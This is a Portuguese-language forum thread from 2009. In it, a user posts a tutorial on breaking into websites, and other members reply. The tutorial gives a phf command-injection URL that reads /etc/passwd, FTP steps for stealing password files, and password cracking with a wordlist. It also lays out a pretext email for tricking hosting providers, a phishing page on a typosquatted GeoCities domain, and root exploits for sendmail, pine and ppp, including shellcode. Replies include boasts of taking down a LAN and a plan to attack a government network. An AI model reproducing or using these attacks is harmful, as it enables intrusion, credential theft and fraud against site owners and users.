Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.


A sabedoria da vida não está em fazer aquilo que se gosta, mas gostar daquilo que se faz. ''Leonardo da Vinci''.
 
InícioInício  NewsNews  ProcurarProcurar  Últimas imagensÚltimas imagens  RegistarRegistar  EntrarEntrar  GaleriaGaleria  
Se você está visitando, registre-se ou efetue o login.
Vote no TOP 30: Portal
Participe da comunidade no XFIRE
Games e PC's: Sua Busca, Nosso Destino !
Informática e Games em Geral.
Siga-nos no Twitter
Mantenha o Fórum Limpo ! No Flood !
Hardware, Softwares, Redes, Eletro e Entretenimento.

 

 Hackear uma Home Page

Ir para baixo 
+3
Alexandre Junior
Iuri CarvalhO
mrk3004
7 participantes
AutorMensagem
mrk3004
Membro Jr
mrk3004


Masculino
Mensagens : 156
Pontos : 5611
Agradecimentos : 21
Data de inscrição : 26/09/2009
Idade : 34
Localização : são paulo
Hackear uma Home Page Moz13 Hackear uma Home Page Inv1010 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Hackear uma Home Page   Hackear uma Home Page EmptySáb 17 Out 2009, 16:21

1-INTRODUÇÃO :

O texto a seguir fala sobre como Hackear uma Home Page.

Aqui estão as suas seções :

Precauções-cuidados que você deve tomar.

Sobre as senhas-arquivos falando sobre as senhas.

Desencryptando as senhas - como desencryptar senhas.

Ftp - como hackear uma HP por [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]

Phf - como hackear uma HP usando o método phf

Home page grátis - como hackear servidores de home page grátis

Home page grátis 2 - Outro método de como hackear servidores de home pages grátis

Já cadastrado - Como hackear uma home page que você já tenha cadastro no mesmo servidor

Telnet e exploits - Como hackear uma page usando telnet e exploits

Já cadastrado 2 - Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor.


2-PRECAUÇÕES:

Nesse texto vou ensinar deversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia.
Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto eu aqui aviso que é de total responsabilidade sua o que for fazer , esse texto é apenas um ensinamento, que deve ser usado para o bem.


3-SOBRE AS SENHAS :

A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd.

Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz
com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow
são impossíveis de "desencryptar"!
(levando em conta que você não tem unix).

Uma senha encryptada é mais ou menos assim :

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh

Agora o exemplo de uma senha com shadow :

root❌0:1:0000-Admin(0000):/:/usr/bin/csh
daemon❌1:1:0000-Admin(0000):/:
bin❌2:2:0000-Admin(0000):/usr/bin:
sys❌3:3:0000-Admin(0000):/:
adm❌4:4:0000-Admin(0000):/var/adm:
lp❌71:8:0000-lp(0000):/usr/spool/lp:
smtp❌0:0:mail daemon user:/:
uucp❌5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp❌9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen❌37:4:Network Admin:/usr/net/nls:
nobody❌60001:60001:uid no body:/:
noaccess❌60002:60002:uid no access:/:
webmastr❌53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo❌55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp❌54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*".
Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.
4-DESENCRYPTANDO :

Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e
logicamente o arquivo onde está senha(passwd).

O que é cada um?

Word list -

Como o próprio nome já diz, é uma lista de palavras.

Desencryptador-

É o programa que você vai usar para desencryptar a senha.

Passwd-

Nesse arquivo está a senha encryptada.
Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite :

"nome do programa desencryptador"
"nome do arquivo onde esta a senha"
"nome da sua word list"

Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim :

jack passwd lista.txt
E pronto! A senha está desencryptada!

Mas como isso funciona??

Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.

Hackear uma HP por ftp

5- FTP Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS.
Espero que você saiba pelo menos mexer no básico do DOS. O que vamos fazer é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd.
Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp <a href="http://www.hackers.com/">[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Ele vai pedir seu USER. Coloque anonymous.
Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo <a href="mailto:fuckyou@idiota.com">fuckyou@idiota.com</a>. Você vai entrar no ftp como user anonymous e retrictions applly!
Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd
vai estar no diretório que você estava quando entrou no [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Tipo windows, arquivos de programas....

Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos..
6-PHF : O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar!
A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser :

<a href="http://endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%">http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%</a> 20/etc/passwd

Apenas isso e pronto!

7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):

Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail
pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês
e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor,
por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."

Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade ou não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail!



8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2):

Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ele deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities.
Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail. E assim você terá a senha. Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulário vai chegar com a senha e user name no teu e-mail.

Há uma tecnica parecida com essa mas é MUITO mais complicada. Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes. Agora entre nas propriedades de TCP/IP. Entre na configuração DNS. Selecione ativar DNS. Agora escreva no HOST--&gt;[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] que geocities está escrito com "l" e não um "i") Então escreva no dominio--&gt;COM. Agora dê OK em tudo. Vai pedir que você reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior. Salva essa pagina e coloque-a no diretório de paginas do seu servidor. Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório. Coloque seu servidor pra funcionar e mande o cara entrar em :

<a href="http://www.geoclties.com/members/tools/file_manager.html">HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html</a>

O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai
funcionar(ooohhh!!!) Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!
Queria avisar que esses metodos também funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo.
9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO SERVIDOR
Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes você não consegue ter acesso aos arquivos da page alvo.

10-TELNET E EXPLOITS :

Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo :
Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root.
cat &lt;&lt; _EOF_ &gt;/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat &lt;&lt; _EOF_ &gt;/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat &lt;&lt; _EOF_ &gt;/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed
s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd
/tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi

Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode ver
os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada
usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas
nos seus inbox. Efetivamente deletando o lockfile respectivo.
Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" &gt; /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
hamors (21 19:04) litterbox:~&gt; pine

catluvr (6 19:06) litterbox:~&gt; ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~&gt; ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05
.302.f5a4

catluvr (8 19:07) litterbox:~&gt; ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine

catluvr (9 19:09) litterbox:~&gt; ln -s /home/hamors/.rhosts
/tmp/.302.f5a4

hamors (23 19:09) litterbox:~&gt; pine
catluvr (11 19:10) litterbox:~&gt; ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep
pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~&gt; echo "+ +" &gt; /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~&gt; cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~&gt; rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~&gt; rlogin litterbox.org -l hamors
Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp.
#include
#include
#include
#define BUFFER_SIZE 156 /* size of the bufer to
overflow */

#define OFFSET -290 /* number of bytes to jump
after the start
of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
/* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
/* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
/* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
/* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);
ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i &lt; strlen(execshell); i++)
*ptr++ = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i &lt; (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;
*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);
}
Agora voce tem o root. Mas use isso apenas como conhecimento Wink

HACKEAR POR FTP:

1. Etapa

Vá ao DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , ex.: (to) <a href="ftp://ftp.convex.com.br/">[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Ao conectar ele pedira a senha e o Password, nao entre com seu e-mail nem com a sua senha se estiver hackeando o seu provedor!!(NUNCA DIGITE NADA NO USERS E NO PASSWORDS)

2. Etapa

No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , pressione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....

3. Etapa Após ENTRAR!!!!!!

Ao entrar vc vai estar no Diretório do login, Ex.: \home\root\ Para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir é um usuário.

Aqui chegamos ao fim , mais lenbre-se , estou compartilhando um pouco do meu conhecimento com vocês mais não quero que isso seja usado para o mal , desejo apenas que com essas informações possamos aprender um pouco mais e ajudar os host e serviços online a corrigir esses tipos de bugs.Agora esta na sua conciencia o que deve fazer...

FONTE: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
ESCRITOR: mrk3004 [Viny Wink]
AGRADECIMENTOS ESPECIAIS: CEDASPY MICROSOFT TECH NET
Ir para o topo Ir para baixo
Iuri CarvalhO
Staff - Administrador
Iuri CarvalhO


Masculino
Game Favorito : Game series for me
Consoles : Xbox 360 Jasper
Sistema Operacional : Windows 7
Mensagens : 3214
Pontos : 9731
Agradecimentos : 180
Data de inscrição : 07/10/2008
Idade : 31
Localização : Salvador/BA
Hackear uma Home Page Ie810 Hackear uma Home Page Php21110 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySeg 19 Out 2009, 14:15

Muito bom o TUTORIAL.

É muito script, mas acho que com muito treino, dá para aprender.
Ir para o topo Ir para baixo
http://www.gamesepcs.com.br
mrk3004
Membro Jr
mrk3004


Masculino
Mensagens : 156
Pontos : 5611
Agradecimentos : 21
Data de inscrição : 26/09/2009
Idade : 34
Localização : são paulo
Hackear uma Home Page Moz13 Hackear uma Home Page Inv1010 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySeg 19 Out 2009, 14:19

Iuri CarvalhO escreveu:
Muito bom o TUTORIAL.

É muito script, mas acho que com muito treino, dá para aprender.


não é muito script, se você ler direitinho , espliquei direitinho o que significa cada variavel .

Ps.: necessario saber pelomenos o "basição" em programação.
Ir para o topo Ir para baixo
Alexandre Junior
Membro Recruta
Alexandre Junior


Masculino
Mensagens : 7
Pontos : 5312
Agradecimentos : 0
Data de inscrição : 14/11/2009
Idade : 25
Localização : São paulo

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySáb 14 Nov 2009, 17:56

Esses dias, derrubei uma Lan de 80 PC
Ir para o topo Ir para baixo
Iuri CarvalhO
Staff - Administrador
Iuri CarvalhO


Masculino
Game Favorito : Game series for me
Consoles : Xbox 360 Jasper
Sistema Operacional : Windows 7
Mensagens : 3214
Pontos : 9731
Agradecimentos : 180
Data de inscrição : 07/10/2008
Idade : 31
Localização : Salvador/BA
Hackear uma Home Page Ie810 Hackear uma Home Page Php21110 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySáb 14 Nov 2009, 18:07

Alexandre Junior escreveu:
Esses dias, derrubei uma Lan de 80 PC

Uau.

Sempre quiz fazer isso.

Twisted Evil
Ir para o topo Ir para baixo
http://www.gamesepcs.com.br
Alexandre Junior
Membro Recruta
Alexandre Junior


Masculino
Mensagens : 7
Pontos : 5312
Agradecimentos : 0
Data de inscrição : 14/11/2009
Idade : 25
Localização : São paulo

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySáb 14 Nov 2009, 18:07

Agora, vo derruba a do Governo
Ir para o topo Ir para baixo
mrk3004
Membro Jr
mrk3004


Masculino
Mensagens : 156
Pontos : 5611
Agradecimentos : 21
Data de inscrição : 26/09/2009
Idade : 34
Localização : são paulo
Hackear uma Home Page Moz13 Hackear uma Home Page Inv1010 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySáb 14 Nov 2009, 20:24

Alexandre Junior escreveu:
Esses dias, derrubei uma Lan de 80 PC


com que finalidade ? ... scratch


Alexandre Junior escreveu:
Agora, vo derruba a do Governo

s/c ...
Ir para o topo Ir para baixo
Iuri CarvalhO
Staff - Administrador
Iuri CarvalhO


Masculino
Game Favorito : Game series for me
Consoles : Xbox 360 Jasper
Sistema Operacional : Windows 7
Mensagens : 3214
Pontos : 9731
Agradecimentos : 180
Data de inscrição : 07/10/2008
Idade : 31
Localização : Salvador/BA
Hackear uma Home Page Ie810 Hackear uma Home Page Php21110 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySáb 14 Nov 2009, 20:29

Alexandre Junior escreveu:
Agora, vo derruba a do Governo

Não tente.

pale
Ir para o topo Ir para baixo
http://www.gamesepcs.com.br
Kabuloso
Membro Ativo
Kabuloso


Masculino
Game Favorito : Brink
Sistema Operacional : Windows Vista
Mensagens : 310
Pontos : 5654
Agradecimentos : 4
Data de inscrição : 22/10/2009
Idade : 32
Localização : Brasil
Hackear uma Home Page Ie710 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySeg 16 Nov 2009, 16:02

Nunca tentei aprender a hackear uma home-page, mas pensando bem. E até divertido.

o____O
Ir para o topo Ir para baixo
mrk3004
Membro Jr
mrk3004


Masculino
Mensagens : 156
Pontos : 5611
Agradecimentos : 21
Data de inscrição : 26/09/2009
Idade : 34
Localização : são paulo
Hackear uma Home Page Moz13 Hackear uma Home Page Inv1010 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySeg 16 Nov 2009, 21:09

Kabuloso escreveu:
Nunca tentei aprender a hackear uma home-page, mas pensando bem. E até divertido.

o____O

Como dito ao fim do topico

lenbre-se , estou compartilhando um pouco do meu conhecimento com vocês mais não quero que isso seja usado para o mal , desejo apenas que com essas informações possamos aprender um pouco mais e ajudar os host e serviços online a corrigir esses tipos de bugs.Agora esta na sua conciencia o que deve fazer...
Ir para o topo Ir para baixo
Iuri CarvalhO
Staff - Administrador
Iuri CarvalhO


Masculino
Game Favorito : Game series for me
Consoles : Xbox 360 Jasper
Sistema Operacional : Windows 7
Mensagens : 3214
Pontos : 9731
Agradecimentos : 180
Data de inscrição : 07/10/2008
Idade : 31
Localização : Salvador/BA
Hackear uma Home Page Ie810 Hackear uma Home Page Php21110 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptyTer 17 Nov 2009, 18:06

mrk3004 escreveu:
Kabuloso escreveu:
Nunca tentei aprender a hackear uma home-page, mas pensando bem. E até divertido.

o____O

Como dito ao fim do topico

lenbre-se , estou compartilhando um pouco do meu conhecimento com vocês mais não quero que isso seja usado para o mal , desejo apenas que com essas informações possamos aprender um pouco mais e ajudar os host e serviços online a corrigir esses tipos de bugs.Agora esta na sua conciencia o que deve fazer...

Concordo, se eu for mesmo aprender as utilidades do hacker, só quero utiliza-las para beneficio.
Ir para o topo Ir para baixo
http://www.gamesepcs.com.br
Sonic Member
Membro Jr
Sonic Member


Masculino
Game Favorito : Sonic Adventure
Sistema Operacional : Windows Vista
Mensagens : 171
Pontos : 5471
Agradecimentos : 3
Data de inscrição : 27/11/2009
Nome Antigo : Red Nose
Idade : 30
Localização : DX
Hackear uma Home Page Saf410 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptySex 27 Nov 2009, 17:33

mrk3004 escreveu:
Kabuloso escreveu:
Nunca tentei aprender a hackear uma home-page, mas pensando bem. E até divertido.

o____O

Como dito ao fim do topico

lenbre-se , estou compartilhando um pouco do meu conhecimento com vocês mais não quero que isso seja usado para o mal , desejo apenas que com essas informações possamos aprender um pouco mais e ajudar os host e serviços online a corrigir esses tipos de bugs.Agora esta na sua conciencia o que deve fazer...

Cara.

Gostei muito do tópico de tuto, pegei facin.

Cria mais tópicos para que os meus conhecimentos e de muitas outras pessoas possam aumentar sobre o ''hacking''.

Grato.

cheers
Ir para o topo Ir para baixo
laiocuestas
Membro Recruta
laiocuestas


Masculino
Game Favorito : SWAT4
Consoles : Xbox 360
Sistema Operacional : Windows XP - Service Pack 2
Mensagens : 53
Pontos : 5355
Agradecimentos : 5
Data de inscrição : 23/12/2009
Nome Antigo : Sky4D
Idade : 30
Localização : São Paulo
Hackear uma Home Page Moz13 Hackear uma Home Page Php31210 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptyDom 17 Jan 2010, 10:52

hahahah, nossa, mesmo lendo tudo isso, não entendi nada!

ashsahhashsahsahsahhsahsa

Essas coisas de Hacker é muito difícil!
Ir para o topo Ir para baixo
@Guuh4
Membro Senior
@Guuh4


Masculino
Sistema Operacional : Windows XP
Mensagens : 643
Pontos : 6153
Agradecimentos : 25
Data de inscrição : 21/02/2010
Nome Antigo : gu80l4
Idade : 29
Localização : Pedreira - SP
Hackear uma Home Page Gog10 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptyTer 23 Fev 2010, 01:12

Citação :


Concordo, se eu for mesmo aprender as utilidades do hacker, só quero utiliza-las para beneficio.

naum lembro onde vi, mas disseram que hacker e akele cara que protege empresas dos CRACKERS, que fazem a parte do mau, mas deram essa má fama aos hackers

eu acho que isso tem logika, um jogo pirata, pra vc poder jogar terá que usar o CRACK
Ir para o topo Ir para baixo
Iuri CarvalhO
Staff - Administrador
Iuri CarvalhO


Masculino
Game Favorito : Game series for me
Consoles : Xbox 360 Jasper
Sistema Operacional : Windows 7
Mensagens : 3214
Pontos : 9731
Agradecimentos : 180
Data de inscrição : 07/10/2008
Idade : 31
Localização : Salvador/BA
Hackear uma Home Page Ie810 Hackear uma Home Page Php21110 Hackear uma Home Page Bra10

Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page EmptyTer 23 Fev 2010, 10:28

gu80l4 escreveu:
Citação :


Concordo, se eu for mesmo aprender as utilidades do hacker, só quero utiliza-las para beneficio.

naum lembro onde vi, mas disseram que hacker e akele cara que protege empresas dos CRACKERS, que fazem a parte do mau, mas deram essa má fama aos hackers

eu acho que isso tem logika, um jogo pirata, pra vc poder jogar terá que usar o CRACK

Os hackers são os mocinhos na verdade..rs

Twisted Evil
Ir para o topo Ir para baixo
http://www.gamesepcs.com.br
Conteúdo patrocinado





Hackear uma Home Page Empty
MensagemAssunto: Re: Hackear uma Home Page   Hackear uma Home Page Empty

Ir para o topo Ir para baixo
 
Hackear uma Home Page
Ir para o topo 
Página 1 de 1
 Tópicos semelhantes
-
» Avast! Home Edition 5.0.377 Final
» Avast! Home Edition 5.0.418 Final
» Modern Warfare 2 "Infamy" Trailer: The War Comes Home!!!

Permissões neste sub-fórumNão podes responder a tópicos
 :: Administrativo :: Conteúdo Removido.-
Ir para:  
Criar fórum no Forumeiros | ©phpBB | Fórum gratuito de ajuda | Denunciar um abuso | Criar um fórum